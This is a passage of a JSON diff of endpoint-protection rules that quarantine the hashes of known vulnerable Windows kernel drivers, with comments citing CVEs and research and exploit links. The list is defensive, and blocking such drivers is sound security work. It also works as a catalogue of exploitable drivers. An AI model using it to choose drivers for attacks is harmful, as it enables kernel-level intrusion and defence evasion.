"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b97ce09c-5bf2-5b51-bb07-97cb9a8b572b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.822185Z", + "creation_date": "2026-03-23T11:45:31.822187Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.822192Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ca7a7790afb16b7ef72beb8c8f1b2d362db9b7c380d1fdc5117d8824db354020", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b9818383-2a23-5ed9-bc1a-cfb36b904f1f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.975042Z", + "creation_date": "2026-03-23T11:45:29.975044Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + 
"endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.975049Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7e81beae78e1ddbf6c150e15667e1f18783f9b0ab7fbe52c7ab63e754135948d", + "comment": "Vulnerable AMD Ryzen Master Driver (aka AMDRyzenMasterDriver.sys) [CVE-2020-12928, CVE-2023-20564] [https://www.loldrivers.io/drivers/13973a71-412f-4a18-a2a6-476d3853f8de/, https://github.com/tijme/amd-ryzen-master-driver-v17-exploit, https://github.com/zeze-zeze/HITCON-2023-Demo-CVE-2023-20562] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b9829f42-4c39-59f1-a3db-8b2075615189", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.143816Z", + "creation_date": "2026-03-23T11:45:32.143818Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.143824Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2759e2290295a81e80ef5d8e95266aa08d67832c0af51267ad1100b89d8b890c", + "comment": "Vulnerable Kernel Driver (aka ACE-BASE.sys) [https://www.loldrivers.io/drivers/ff77b58d-e143-4f61-92de-c0d9bc0af7d5/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"b992a289-6657-5591-9dd2-deedf1746e4b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.148451Z", + "creation_date": "2026-03-23T11:45:31.148453Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.148458Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "76ad8523b85c431b00e8025d7513a0a7058ec1fad1eda456b857087029a3119f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b9979068-f152-5381-893b-283151f7aaa1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.148590Z", + "creation_date": "2026-03-23T11:45:31.148592Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:31.148598Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7b377a73f5b7ac58897de2ee6108a2fb0401af9ad584a33902a9fcff40f5066e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b997cf40-f107-57ce-954e-2495517b4655", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.984511Z", + "creation_date": "2026-03-23T11:45:29.984513Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.984519Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "68b8f7154ad202145cf51ed2a8e21268af75efafff36db254e6943e154bd915a", + "comment": "Vulnerable Kernel Driver (aka inpoutx64.sys) [https://www.loldrivers.io/drivers/91ff1575-9ff2-46fd-8bfe-0bb3e3457b7f/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b9a16e45-27cf-5725-bef5-42be4d291509", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.618097Z", + "creation_date": "2026-03-23T11:45:29.618099Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.618104Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5cc6b647174c8efa0a81ec1d3cb0464c8a567456571d0939fb2e76c6850bf7cb", + "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b9b12495-17ae-558d-881e-380ecb88e74f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.471569Z", + "creation_date": "2026-03-23T11:45:30.471572Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.471581Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "41765151df57125286b398cc107ff8007972f4653527f876d133dac1548865d6", + "comment": "Vulnerable Kernel Driver (aka AsIO.sys) [https://www.loldrivers.io/drivers/bd7e78db-6fd0-4694-ac38-dbf5480b60b9/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b9bd24c9-ab07-500d-9dd7-e0a03fd7dc18", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.478744Z", + "creation_date": "2026-03-23T11:45:31.478747Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.478756Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2c27561b68e478bab9a1f391060c479ea67d6a23bf4531029c6bc94a4f9c5ff0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b9d044a7-5b8a-5000-ba3c-29ec41ab46df", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.808128Z", + "creation_date": "2026-03-23T11:45:31.808132Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.808140Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6550963f98cc27366813fba3bcd61feb1f830a5e502384073ff6fad28158c97b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b9d69e9f-edbd-5ef7-a305-9469b9c3e83c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.812598Z", + "creation_date": "2026-03-23T11:45:31.812600Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.812606Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1075c8bdd4decafad2f1614ef5f9d60e4fc41a5c82510f5631484e6db222b49e", + "comment": "Vulnerable Adlice Software 
Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b9dfecd7-5ed1-5725-9c40-6c7365cdba9c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.142830Z", + "creation_date": "2026-03-23T11:45:32.142833Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.142839Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e8bdfab9d5b5c37f6f23ddf9dddba2feb74261b61a80dee0c6aebffbf39948fb", + "comment": "Vulnerable ITM SYSTEM File Filter Driver (aka probmon.sys) [https://antonioparata.blogspot.com/2024/02/exploiting-vulnerable-minifilter-driver.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b9e36ec0-fabf-5571-a2f8-f6977827bb46", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:30.824661Z", + "creation_date": "2026-03-23T11:45:30.824664Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.824672Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fb1db36d8465baecf79e37e992f7552749503b942c76c4138cb39e0f86e5fbff", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b9e740d1-0681-5f4e-b576-0a6297a7ebdc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.815993Z", + "creation_date": "2026-03-23T11:45:30.815995Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.816001Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "270547552060c6f4f5b2ebd57a636d5e71d5f8a9d4305c2b0fe5db0aa2f389cc", + "comment": "Vulnerable Kernel Driver (aka ecsiodriverx64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} 
+{ + "id": "b9e85c60-cf67-5de8-89a7-08b835fc6a12", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.477849Z", + "creation_date": "2026-03-23T11:45:30.477853Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.477862Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ad5418a4b5edf1c963da343b1bdba14fac9e8ee49489b2f35136c4aebc9540b8", + "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b9f10145-f570-5291-9210-5774fc338d5e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.828962Z", + "creation_date": "2026-03-23T11:45:31.828965Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:31.828973Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "11cc3b62ab1db95187a0d65c321b6514f53757b50a46be0a0d9dc13d98d58d01", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ba068929-f5c9-5951-965d-e0b1586784d4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.809263Z", + "creation_date": "2026-03-23T11:45:31.809266Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.809275Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "534915d8e06cf020f0bfa567c425fa206a3d0c175d10a6f039e4da2eb37740cc", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ba0d2233-4af7-5069-a3e0-9a0874a50878", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.821393Z", + "creation_date": "2026-03-23T11:45:31.821395Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.821401Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "aa755a932255ccdc3e40f3d9db14c8c53dd15ec43f678e88262a3a6d29be0865", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ba118ba8-3db7-5b85-8788-97e7291f64fc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.818941Z", + "creation_date": "2026-03-23T11:45:30.818943Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.818955Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + 
"references": [], + "type": "hash", + "value": "c3577eeb107de6a0cdf6ac3ee75339f09fd0eb00b4d368bf841b6126af7629a1", + "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ba1da611-e3fa-5321-9875-b634c4b8c736", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.826747Z", + "creation_date": "2026-03-23T11:45:31.826749Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.826755Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b306a86b99f6e6273e920e5ee29a0f1eb2aa54074af3369b0c3fef86452694a5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ba21f595-85d5-55fc-9a21-abf3b7c737e2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, 
+ "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.822945Z", + "creation_date": "2026-03-23T11:45:31.822956Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.822964Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5a6f2532148a28855b741f3246162f58b940c8b4c3f7a218abcd029c624595e5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ba28b337-ca8f-5d88-84d4-b24409b7e2e4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.818381Z", + "creation_date": "2026-03-23T11:45:31.818384Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.818392Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9b1a3223f2a0e5468ee5ea9250747abb91ad144e529d12298ed406498e2b6949", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware 
Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ba28b817-6ea9-511a-a026-114097d1c7ab", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.475314Z", + "creation_date": "2026-03-23T11:45:31.475318Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.475328Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7eb0e8be6426ef7337546df5dac9ec682ac3ecfe75739a777fe79a677d935783", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ba4950e5-1616-5b71-befb-9b57f8e647b3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:29.607311Z", + "creation_date": "2026-03-23T11:45:29.607313Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.607318Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a10b4ed33a13c08804da8b46fd1b7bd653a6f2bb65668e82086de1940c5bb5d1", + "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ba4f15ac-920c-524e-b30d-4de6ff7c57ab", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 